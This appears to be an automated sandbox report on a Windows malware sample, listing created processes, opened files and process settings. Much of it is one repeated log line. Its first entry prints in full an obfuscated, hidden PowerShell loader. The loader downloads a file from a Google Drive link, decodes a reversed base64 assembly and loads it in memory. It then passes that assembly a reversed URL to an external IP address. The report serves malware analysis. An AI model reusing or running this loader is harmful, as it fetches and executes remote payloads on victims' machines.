            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04A82D17 push 04B8079Eh; retf 3_2_04A82D1E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04A85662 push eax; iretd 3_2_04A85699
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_079138A2 push esi; retf 3_2_079138AB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03056DD8 push eax; iretd 9_2_03056DD9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07773601 push ebp; iretd 9_2_07773608
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07773457 push esp; iretd 9_2_07773458
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
